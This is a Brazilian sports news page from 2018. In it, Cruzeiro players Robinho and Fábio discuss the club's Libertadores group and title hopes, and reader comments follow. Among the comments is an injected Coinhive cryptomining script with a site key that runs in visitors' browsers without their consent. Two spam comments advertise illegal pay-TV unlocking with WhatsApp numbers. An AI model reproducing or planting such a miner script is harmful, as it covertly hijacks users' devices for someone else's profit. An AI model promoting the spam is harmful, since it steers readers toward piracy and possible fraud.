logo

1/2/2018 16:45

Jogadores falam sobre a ambição do Cruzeiro na Libertadores

Jogadores falam sobre a ambição do Cruzeiro na Libertadores
Foto: Paulo Fonseca/EFE

O Cruzeiro voltará nesta temporada para a disputa da Libertadores da América. A última participação do maior de Minas foi em 2015, quando foi eliminado pelo River Plate nas quartas de final. Agora com uma equipe completamente reforçada, o time tem até os adversários preferidos.



Pelo menos foi o que disse o meio-campista Robinho, que admitiu não querer enfrentar o Vasco da Gama na fase de grupos.

"Acho que vai ser o Vasco sim. Confesso que eu não gostaria que fosse o Vasco. Não queria que eles passassem. Mas acho que vão ser eles, pelo jogo que fizeram ontem (quarta-feira). Praticamente passaram. Depois também vão ter uma pedreirinha, mas vão passar. Realmente é o grupo da morte. Mas a gente está preparado. Para ser campeão, tem que estar preparado. Que venham os melhores", confessou o meia em entrevista coletiva realizada nesta quinta-feira.

Bem verdade que o grupo do time celeste é visto por muitos como o "Grupo da Morte", que ainda conta com Universidad de Chile e Racing-ARG. A equipe do Rio de Janeiro ainda disputa as preliminares, mas está encaminhando bem sua classificação no torneio. O goleiro Fábio falou sobre a disputa dentro da chave 5 e ressaltou a força das equipes brasileiras e argentinas.

"Principalmente com as equipes da Argentina: geralmente são francos concorrentes à disputa do títulos. Todo ano essas equipes, junto com as do Brasil, são as fortes e tradicionais dentro da competição. Temos que ter a consciência que vamos ter bastante dificuldade fora de casa. A evolução diária que estamos tendo é muito boa. Vamos ter um nível muito bom de entrosamento, em todos os aspectos. Esperamos começar com o pé direito", disse o camisa 1.

A Libertadores é o grande objetivo do elenco e principalmente do ídolo cruzeirense, que ainda não tem a medalha da competição em sua prateleira. Fábio é bicampeão da Copa do Brasil e do Brasileirão pelo clube, mas ainda não faturou o torneio continental.

"A Libertadores gera, em todos os torcedores, e em todos nós no Cruzeiro, uma expectativa muito grande. A última (que o Cruzeiro conquistou) foi em 97, estivemos muito próximo de ganhar o tri em 2009. Neste ano, dentro de tudo o que vem sendo planejado, gera, com certeza, expectativa. Mas temos que conciliar as outras competições. Focar dentro de cada competição, para não deixarmos nada a desejar. Usufruir dessas competições e agregar força. Isso vai nos favorecer e ajudar a ficarmos mais perto dos nossos objetivos, que são os títulos", completou.

3702 visitas - Fonte: Cruzeiro Web




Não gostei de Robinho confessa fraqueza pois somos Cruzeiro caraio, venha quem vier uai

tomara q o cruzeiro entre muito bem focado em todas as competições. porque o elenco é muito forte e precisa se adaptarem o mais rápido possível. e time q quer ser campeão não tem q escolher adversários não. é bom adversário forte mesmo q já entra mais determinador como se fossem ja a decisão.....

estam tendo dificuldade no campeonato mineiro imagine na libertadores

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça
liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

acho bom treinaram bem entra em conjunto toque de bola velocidade ora não ser surpreebdido

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui.